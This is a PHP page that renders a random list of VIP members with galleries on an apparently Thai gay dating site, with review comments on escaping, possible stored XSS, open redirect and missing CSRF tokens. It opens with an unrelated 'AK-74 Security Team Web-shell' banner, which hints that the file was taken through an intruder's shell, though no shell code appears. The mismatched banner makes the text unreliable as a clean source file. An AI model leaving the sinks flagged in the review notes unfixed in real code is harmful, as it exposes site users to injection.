.:: :[ AK-74 Security Team Web-shell ]: ::.
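<?php
/**
 * Renders the "members with a gallery" (สมาชิกที่มี Gallery) listing: a random
 * selection of active members that have a post and a VIP period covering
 * today, one table row per member.
 *
 * The $config* settings, the $a_gender_* lookup arrays, $admin and the
 * sql_*(), getListModelLike(), scanInvective*() and createLikeTab() helpers
 * are not defined in this file; they are presumably provided by the three
 * includes below.
 *
 * Output encoding: the row values (username, email, message, links, ...) are
 * treated as untrusted profile data. Each one is encoded for the context it
 * is written into: htmlspecialchars() for HTML text and attributes,
 * json_encode() + htmlspecialchars() for JavaScript inside an on* attribute,
 * urlencode()/rawurlencode() for URL components.
 * NOTE(review): if the storage layer already HTML-escapes these columns the
 * values will now be double-encoded; confirm against the write path.
 */
include("include/config.php");
include("include/connect.php");
$startFunctionDefault = 'no'; // must be set before function.php is included
include("include/function.php");

$counter = $counter_mgt = 0;
$today = @date("Y-m-d");

// No request data reaches this statement: the only interpolated values are
// today's date and the configured page size (forced to an integer here).
// One extra row is fetched; the loop below stops at the configured size.
$sql = " SELECT member.member_id AS member_id, username, image, camera, gender, post_date, image, gender, age, email, province, message, hi5_link, facebook_link, room, bb_pin, line_id, instagram, alarm_status, like_qty, gallery_enable, gallery_image"
     . " FROM member"
     . " INNER JOIN member_post ON member.member_id = member_post.member_id AND member.active_status = 1"
     . " INNER JOIN vip ON member.member_id = vip.member_id AND vip.start_date <= '" . $today . "' AND vip.stop_date >= '" . $today . "'"
     . " ORDER BY RAND() LIMIT 0, " . ((int) $configShowPostListRecord + 1);

$query = sql_query($sql);
$allRow = sql_num_rows($query);

if ($allRow > 0) {
    // The list of members this visitor has liked is loaded once per session.
    if (!isset($_SESSION['s_a_list_member_like'])) {
        $a_list_member_like = getListModelLike();
        $_SESSION['s_a_list_member_like'] = $a_list_member_like;
    }

    $showDetail = 0; // Don't show member names in the like list (0, 1)
    $a_list_member_like = $_SESSION['s_a_list_member_like'];

    $mktime = mktime(0, 0, 0, date("m"), (date("d") - 1), date("Y"));
    $yesterday = date("Y-m-d", $mktime);
?>
<table width="100%" border="0" cellspacing="0" cellpadding="0" class="search-table">
  <tr>
    <td width="91%" style="font-size:18px; font-weight:bold; text-align:center;">สมาชิกที่มี Gallery</td>
    <td width="9%" align="center"><a href="/<?php echo $configMyFileFirstPage?>?view-gallery=1" style="color:#FFFFFF">View All</a></td>
  </tr>
</table>
<table width="850" border="0" cellpadding="0" cellspacing="0" style="padding:5px 0 20px 0;">
  <tr>
    <!--<th width="3%" align="center" class="postlistFieldTh"><img src="images/b-online.jpg" alt="Online" width="25" height="39" /> <img src="images/msn-gay.gif" width="2" height="1" /></th>-->
    <th width="35" class="postlistFieldTh" align="center"><img src="/images/bar-p-time.gif" alt="เวลา" width="35" height="39" /></th>
    <th width="51" class="postlistFieldTh" align="center"><img src="/images/bar-p-pic.gif" alt="รูป" width="25" height="39" /></th>
    <th width="61" class="postlistFieldTh" align="center"><img src="/images/bar-p-sex.gif" alt="เพศ" width="32" height="39" /></th>
    <th width="33" class="postlistFieldTh" align="center"><img src="/images/bar-p-age.gif" alt="อายุ" width="33" height="39" /></th>
    <th width="156" class="postlistFieldTh" align="center"><img src="/images/bar-p-connect.jpg" alt="การติดต่อ" width="70" height="39" /></th>
    <th width="53" class="postlistFieldTh" align="center"><img src="/images/bar-p-prov.gif" alt="จังหวัด" width="53" height="39" /></th>
    <th width="423" class="postlistFieldTh" align="center"><img src="/images/bar-p-text.gif" alt="ข้อความ" width="62" height="39" /></th>
    <th width="38" align="center" class="postlistFieldThEnd"><img src="/images/b-like.jpg" alt="Like" width="38" height="39"></th>
  </tr>
<?php
    while ($rec = sql_fetch_array($query)) {
        $counter++;
        if ($counter > $configShowPostListRecord) break;

        $indexGender = $rec['gender'];
        $className = $a_gender_style["$indexGender"];

        // The code that used to set $check (a VIP lookup) is disabled, so the
        // variable was read while undefined further down. Initialising it to
        // false keeps the effective behaviour without the undefined read.
        $check = false;

        $alt = ($indexGender == 'ไม่ระบุ') ? 'เกย์' : $indexGender;
        $alt .= ', Gay, หาเพื่อนเกย์';

        // Context-encoded copies of the row values used in the markup below.
        $altHtml      = htmlspecialchars($alt, ENT_QUOTES, 'UTF-8');
        $usernameHtml = htmlspecialchars((string) $rec['username'], ENT_QUOTES, 'UTF-8');
        $memberIdHtml = htmlspecialchars((string) $rec['member_id'], ENT_QUOTES, 'UTF-8');
        // JavaScript string literal, then HTML-attribute encoded. addslashes()
        // alone does not stop a double quote from closing the on* attribute.
        $emailJsAttr  = htmlspecialchars(json_encode((string) $rec['email']), ENT_QUOTES, 'UTF-8');
?>
  <tr>
    <!--<td align="center" class="postlistField"> </td>-->
    <td align="center" nowrap="nowrap" class="<?php echo $className?>"><?php
        // Time of day, plus a "yesterday" marker or a dd/mm/yy date for older posts.
        $postTimeHtml = htmlspecialchars(substr($rec['post_date'], 11, 5), ENT_QUOTES, 'UTF-8');
        if (strpos($rec['post_date'], $today) !== false) {
            echo $postTimeHtml;
        } elseif (strpos($rec['post_date'], $yesterday) !== false) {
            echo $postTimeHtml . "<br />เมื่อวาน";
        } else {
            list($myYear, $myMonth, $myDate) = explode('-', substr($rec['post_date'], 0, 10));
            echo $postTimeHtml . "<br />"
               . htmlspecialchars($myDate . '/' . $myMonth . '/' . substr($myYear, -2), ENT_QUOTES, 'UTF-8');
        }
    ?></td>
    <td align="center" class="<?php echo $className?>"><a href="/ladyboy/<?php echo $usernameHtml?>" target="_blank"><?php
        // NOTE(review): the stored file name is appended to the upload
        // directory as-is; confirm the upload path rejects names containing
        // directory separators or "..".
        $imagePath = 'uploads/memberPost/' . $rec['image'];
        $genderIcon = '<img src="' . $a_gender_icon["$indexGender"] . '" width="60" height="60" border="0" title="' . $altHtml . '" alt="' . $altHtml . '">';

        if ( ($rec['image'] <> '') && (file_exists($imagePath)) ) {
            // Clamp to the configured maximum; fall back to the maximum when
            // the size is unknown (getimagesize() returns false on failure).
            $aSize = getimagesize($imagePath);
            $imgWidth = $configMemberPostWidth;
            $imgHeight = $configMemberPostHeight;
            if (is_array($aSize)) {
                if ($aSize[0] != '' && $aSize[0] <= $configMemberPostWidth) $imgWidth = $aSize[0];
                if ($aSize[1] != '' && $aSize[1] <= $configMemberPostHeight) $imgHeight = $aSize[1];
            }
            echo '<img src="/' . htmlspecialchars($imagePath, ENT_QUOTES, 'UTF-8') . '" width="' . (int) $imgWidth . '" height="' . (int) $imgHeight . '" border="0" title="' . $altHtml . '" alt="' . $altHtml . '">';
        } elseif (trim($rec['facebook_link']) == '') {
            echo $genderIcon;
        } elseif (preg_match('/id=/i', $rec['facebook_link'])) {
            // Profile picture from the id= value of the stored link.
            $aData = explode('id=', $rec['facebook_link']);
            echo '<img src="https://graph.facebook.com/' . rawurlencode(end($aData)) . '/picture" border="0" title="' . $altHtml . '" alt="' . $altHtml . '">';
        } elseif (preg_match('/\//', $rec['facebook_link'])) {
            // Profile picture from the last path segment of the stored link.
            $aData = explode('/', $rec['facebook_link']);
            echo '<img src="https://graph.facebook.com/' . rawurlencode(end($aData)) . '/picture" border="0" title="' . $altHtml . '" alt="' . $altHtml . '">';
        } else {
            echo $genderIcon;
        }
    ?></a><?php
        if ($rec['gallery_enable'] == 1) {
            // gallery_image holds file names separated by "::"; only the first
            // link is visible, the rest exist for the lightbox to page through.
    ?><div id="galleryVIP-<?php echo $memberIdHtml?>" class="gallery-group"><?php
            $a_img = explode('::', $rec['gallery_image']);
            $countImgGallery = 0;
            foreach ($a_img as $img) {
                if ($img == '') continue;
                ?><a href="/uploads/gallery_image/full/<?php echo htmlspecialchars($img, ENT_QUOTES, 'UTF-8')?>"<?php if (++$countImgGallery > 1) echo ' style="display:none"'; ?> title="<?php echo $usernameHtml?>"><img src="/images/gallery-view.png" style="border:0; padding:3px 0 3px 0;"></a><?php
            }
    ?></div>
    <script type="text/javascript">
    $(function() {
        $(<?php echo json_encode('#galleryVIP-' . $rec['member_id'] . ' a', JSON_HEX_TAG)?>).lightBox();
    });
    </script>
<?php
        } // end if ($rec['gallery_enable'] == 1)
?></td>
    <td align="center" class="<?php echo $className?>"><a href="/ladyboy/<?php echo $usernameHtml?>" target="_blank" title="<?php echo $altHtml?>" style="text-decoration:none; color:#000000;"><?php echo htmlspecialchars((string) $rec['gender'], ENT_QUOTES, 'UTF-8')?></a></td>
    <td align="center" class="<?php echo $className?>"><?php echo htmlspecialchars((string) $rec['age'], ENT_QUOTES, 'UTF-8')?></td>
    <td align="center" valign="top" class="<?php echo $className?>">
      <div class="social-icon">
<?php
        // Contact icons, wrapped every $configPostlistConnectColum icons.
        $social_count = 0;
        $social_text = '';

        if ($rec['camera'] == 1) {
            $social_text .= '<img src="/images/social-icon/cam.gif" width="25" height="25" title="มีกล้อง" alt="มีกล้อง" align="absmiddle">';
            if (++$social_count % $configPostlistConnectColum == 0) $social_text .= '<br>';
        }

        $social_text .= '<img src="/images/social-icon/msn.png" align="absmiddle" style="border:none; cursor:pointer;" onclick="showColorBoxMessage(' . $emailJsAttr . ')">';
        if (++$social_count % $configPostlistConnectColum == 0) $social_text .= '<br>';

        if ( $rec['room'] == '1' ) {
            $social_text .= '<img src="/images/social-icon/show-home.gif" border="0" width="25" height="25" title="มีห้อง" alt="มีห้อง" align="absmiddle">';
            if (++$social_count % $configPostlistConnectColum == 0) $social_text .= '<br>';
        }

        // The link is a query-string value, so it has to be URL-encoded; the
        // previous urldecode() wrote it raw into the href, which truncated it
        // at the first "&" and let a quote break out of the attribute.
        // NOTE(review): the pattern is an unanchored substring match with an
        // unescaped dot, so it does not prove the link points at the named
        // site. redirectLink.php is not shown here; it should validate the
        // destination host itself before redirecting.
        if ( ($rec['facebook_link'] <> '') && (preg_match('/facebook.com/i',$rec['facebook_link'])) ) {
            $social_text .= '<a href="redirectLink.php?l=' . urlencode($rec['facebook_link']) . '" target="_blank"><img src="/images/social-icon/show-fb.gif" width="25" height="25" title="มี FaceBook" alt="มี FaceBook" align="absmiddle" border="0"></a>';
            if (++$social_count % $configPostlistConnectColum == 0) $social_text .= '<br>';
        }

        if ( $rec['instagram'] <> '' ) {
            $social_text .= '<img src="/images/social-icon/icon-instagram.gif" width="25" height="25" title="มี Instagram" alt="มี Instagram" border="0" onclick="showColorBoxMessage(' . htmlspecialchars(json_encode('Instagram : ' . $rec['instagram']), ENT_QUOTES, 'UTF-8') . ')" align="absmiddle" style="cursor:pointer">';
            if (++$social_count % $configPostlistConnectColum == 0) $social_text .= '<br>';
        }

        if ( $rec['line_id'] <> '' ) {
            $social_text .= '<img src="/images/social-icon/icon-line.gif" width="25" height="25" title="มี Line" alt="มี Line" border="0" onclick="showColorBoxMessage(' . htmlspecialchars(json_encode('Line Id : ' . $rec['line_id']), ENT_QUOTES, 'UTF-8') . ')" align="absmiddle" style="cursor:pointer">';
            if (++$social_count % $configPostlistConnectColum == 0) $social_text .= '<br>';
        }

        if ( $rec['bb_pin'] <> '' ) {
            $social_text .= '<img src="/images/social-icon/show-bb.gif" width="25" height="25" title="มี BB Pin" alt="มี BB Pin" border="0" onclick="showColorBoxMessage(' . htmlspecialchars(json_encode('BB Pin : ' . $rec['bb_pin']), ENT_QUOTES, 'UTF-8') . ')" align="absmiddle" style="cursor:pointer">';
            if (++$social_count % $configPostlistConnectColum == 0) $social_text .= '<br>';
        }

        if ( ($rec['hi5_link'] <> '') && (preg_match('/hi5.com/i',$rec['hi5_link'])) ) {
            $social_text .= '<a href="redirectLink.php?l=' . urlencode($rec['hi5_link']) . '" target="_blank"><img src="/images/social-icon/show-hi5.gif" width="25" height="25" title="มี Hi5" alt="มี Hi5" border="0" align="absmiddle"></a>';
            if (++$social_count % $configPostlistConnectColum == 0) $social_text .= '<br>';
        }

        echo ($social_text == '') ? ' ' : $social_text;
      ?></div><?php
        // The disabled VIP badge and msnim: link blocks that followed here
        // were commented-out code with no runtime effect and are omitted.
    ?></td>
    <td width="55" align="center" class="<?php echo $className?>"><?php echo htmlspecialchars((string) $rec['province'], ENT_QUOTES, 'UTF-8')?></td>
    <td align="center" class="<?php echo $className?>"><span onmouseover="this.style.cursor='pointer'" onclick="showColorBoxMessage(<?php echo $emailJsAttr?>)"><?php
        // NOTE(review): the scanInvective*() helpers are not visible here and
        // their return value is echoed as-is; confirm that they HTML-escape
        // the member's message, otherwise this cell is a stored-XSS sink.
        if ($rec['alarm_status'] == 0) {
            if (@in_array($indexGender, $a_gender_extra)) {
                echo scanInvectiveExtra($rec['message'],'** ');
            } else {
                if ($check) echo scanInvectiveExtra($rec['message'],'** ');
                else echo scanInvective($rec['message'],'** ');
            }
        } else {
            // Flagged post: show the configured placeholder text instead.
            echo str_replace('##', $a_gender_word["$indexGender"], $configTextPostAlarm);
        }
    ?></span><?php
        if ($admin == 1) {
            // Admins can flag the image or the message of a post.
            // PHP_SELF and QUERY_STRING are controlled by whoever built the
            // request URL, so the target URL is assembled in PHP and emitted
            // as an encoded JavaScript string rather than spliced into the
            // handler text.
            // NOTE(review): these are state-changing GET requests with no
            // anti-CSRF token visible on this page; getQueryBan.php should
            // check the admin session and a token, and validate frompage
            // before redirecting to it.
            $banParams = '&member_id=' . $rec["member_id"] . '&selectRow=' . $counter_mgt . '&frompage=' . $_SERVER['PHP_SELF'];
            if ($_SERVER['QUERY_STRING'] <> '') $banParams .= '&' . $_SERVER['QUERY_STRING'];

            $alarmImageUrlJs = htmlspecialchars(json_encode('/getQueryBan.php?action=alarmImage' . $banParams), ENT_QUOTES, 'UTF-8');
            $alarmUrlJs      = htmlspecialchars(json_encode('/getQueryBan.php?action=alarm' . $banParams), ENT_QUOTES, 'UTF-8');
            $swapUrlJs       = htmlspecialchars(json_encode('/getQueryBan.php?action=swapSection' . $banParams), ENT_QUOTES, 'UTF-8');
    ?>
      <br /><input type="button" name="buttonImage_<?php echo $memberIdHtml?>" id="buttonImage_<?php echo $memberIdHtml?>" value="เตือนรูป" onclick="if( confirm('ต้องการเตือนรูปภาพของ Email : ' + <?php echo $emailJsAttr?> + ' หรือไม่ ?\n\nหากแจ้งเตือนรูปภาพของ Email นี้จะแสดงรูปภาพเป็นรูป Default') ) { window.location=<?php echo $alarmImageUrlJs?>; }" />
      <input type="button" name="buttonMessage_<?php echo $memberIdHtml?>" id="buttonMessage_<?php echo $memberIdHtml?>" value="เตือนข้อความ" onclick="if( confirm('ต้องการเตือน Email : ' + <?php echo $emailJsAttr?> + ' หรือไม่ ?\n\nหากแจ้งเตือนข้อความของ Email นี้จะแสดงเป็นค่า Default ที่ระบบตั้งไว้') ) { window.location=<?php echo $alarmUrlJs?>; }" />
      <img src="/images/rotate.jpg" width="20" title="แจ้งเตือนการโพสต์ในเชิงโฆษณา" alt="แจ้งเตือนการโพสต์ในเชิงโฆษณา" style="cursor:pointer" onclick="if( confirm('ต้องการแจ้งเตือนการโพสต์ข้อความของ Email : ' + <?php echo $emailJsAttr?> + ' หรือไม่ ') ) { window.location=<?php echo $swapUrlJs?>; }" />
<?php
        } // end if ($admin == 1)
?></td>
    <td align="left" valign="top" nowrap="nowrap" class="<?php echo $className?>"><?php
        // like_action is 0 when the member is already in the session's like list, else 1.
        $like_action = ( @in_array($rec["member_id"], $a_list_member_like) ) ? 0 : 1;
        echo createLikeTab('create', $rec["member_id"], $like_action, $rec['like_qty'], $showDetail);
    ?></td>
  </tr>
<?php
    } // end while
?>
</table><?php
} // end if ($allRow > 0)
?>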